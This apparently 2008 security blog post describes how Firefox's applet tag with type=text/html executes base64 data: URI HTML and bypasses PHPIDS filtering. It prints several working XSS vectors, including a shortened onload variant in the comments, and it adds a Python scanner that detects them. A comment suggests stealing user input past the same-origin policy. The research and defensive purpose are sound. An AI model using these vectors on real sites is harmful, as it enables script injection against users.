Firefox applet fun

I’ve been hacking on PHPIDS recently, and I wanted a pure XSS vector, not just script execution. I decided to experiment with the applet tag because it sneaks past the malicious tag detection, and I wondered whether it accepts the type attribute like the object tag does….

<applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" type=text/html>

That works: it executes the base64 encoded string as HTML! It doesn’t stop there though :)

<applet src="http://www.businessinfo.co.uk" type=text/html>

The applet tag even acts like an iframe :D
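From the filter side, the lesson is that applet has to be treated as an active-content tag like object and embed, with its type attribute and any data: URI in src inspected rather than passed through. The following scanner is an added example, not code from this post or from PHPIDS; it also handles the attribute-less shortened form from the comments, and the SAMPLES are constructed from the vectors above.

```python
import base64
from html.parser import HTMLParser
from urllib.parse import unquote

# Tags that load or execute active content: applet belongs here with object/embed.
ACTIVE_TAGS = {"applet", "object", "embed", "iframe", "script"}
URL_ATTRS = {"src", "data", "href", "code", "codebase"}
MAX_DEPTH = 3  # nested data: documents we are willing to decode

class ActiveContentScanner(HTMLParser):
    def __init__(self, depth=0):
        super().__init__()
        self.findings, self.depth = [], depth

    def handle_starttag(self, tag, attrs):
        # Names arrive lower-cased; a bare attribute (the "src" in the shortened form) is None.
        attrs = {name: (value or "").strip() for name, value in attrs}
        if tag in ACTIVE_TAGS:
            self.findings.append(f"active tag <{tag}> type={attrs.get('type', '')!r}")
        for name, value in attrs.items():
            if name.startswith("on"):
                self.findings.append(f"event handler {name}={value!r}")
            if name in URL_ATTRS and value.lower().startswith("data:"):
                self.findings.append(f"data: URI in {name}")
                self.findings.extend(scan_data_uri(value, self.depth + 1))

def scan_data_uri(uri, depth):
    """Decode a data: URI (base64 or percent-encoded) and scan its document."""
    if depth > MAX_DEPTH:
        return ["data: URI nested too deeply, not decoded"]
    header, _, payload = uri.partition(",")
    if ";base64" in header.lower():
        padded = payload + "=" * (-len(payload) % 4)  # vectors often drop padding
        text = base64.b64decode(padded, validate=False).decode("utf-8", "replace")
    else:
        text = unquote(payload)
    return [f"nested: {finding}" for finding in scan_html(text, depth)]

def scan_html(markup, depth=0):
    """Return a list of findings for a fragment of untrusted HTML."""
    scanner = ActiveContentScanner(depth)
    scanner.feed(markup)
    scanner.close()
    return scanner.findings

# Constructed samples: the three vectors from this post plus a benign control.
SAMPLES = {
    "data_uri": '<applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" type=text/html>',
    "remote": '<applet src="http://www.businessinfo.co.uk" type=text/html>',
    "shortened": "<applet/src/type=text/html onload=alert(1)>",
    "benign": '<p>Hello <a href="https://example.com">link</a></p>',
}
```

The base64 payload in the first vector decodes to a script element, so the nested scan reports it even though the outer markup contains no script tag at all.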


Comments 13

  1. ehmo wrote:

    hey man, nice find.

    Posted 20 May 2008 at 10:49 am
  2. Gareth Heyes wrote:

    @ehmo

    Thx, it was fun to find :)

    Posted 20 May 2008 at 11:17 am
  3. Gareth Heyes wrote:

    Here’s a shortened XSS vector:-
    <applet/src/type=text/html onload=alert(1)

    Posted 20 May 2008 at 12:07 pm
  4. daniel wrote:

    My only issue would be sites that use strict XHTML, this would be rendered useless, no?

    Posted 20 May 2008 at 12:50 pm
  5. Gareth Heyes wrote:

    @daniel

    I ran a test in strict HTML and it still seemed to work

    Posted 20 May 2008 at 12:56 pm
  6. daniel wrote:

    interesting, damn good find then sir!

    Posted 20 May 2008 at 1:37 pm
  7. Alex wrote:

    Which version of Firefox did you use ? I tried it with Firefox 3 RC1 and it didn’t work.

    Posted 20 May 2008 at 2:47 pm
  8. Gareth Heyes wrote:

    @Alex

    Not tried with beta but it works with latest FF2

    Posted 20 May 2008 at 2:50 pm
  9. Alex wrote:

    I’ve tested it with the latest FF2. Now it works.
    It’s time to try accessing any property or value from outside that “iframe”. Maybe we can bypass the same origin policy and steal user input from within this “iframe”.

    Posted 20 May 2008 at 6:50 pm
  10. Gareth Heyes wrote:

    @Alex

    Yeah I thought that might be possible but it appears that the properties can’t be accessed using “this” and the frames array. However if you can prove me wrong then I’d be very interested on how to do it :)

    Posted 20 May 2008 at 6:57 pm
  11. Alex wrote:

    I’ve tried some code to access data from within this “iframe”, but you’re right so far. ’til now I didn’t manage to get around the protection.

    Posted 20 May 2008 at 10:16 pm
  12. .mario wrote:

    Nice stuff Gareth - finally a “real” XSS again ;) Has been a pretty long time. The issues are fixed in the trunk - 0.4.8 as soon as I return from OWASP Europe.

    Posted 21 May 2008 at 9:19 am
  13. Gareth Heyes wrote:

    @.mario

    Thx, I knew about the applet tag insert for a while but I didn’t think it was exploitable. It was good fun to find :D good luck with the conference

    Posted 21 May 2008 at 9:59 am
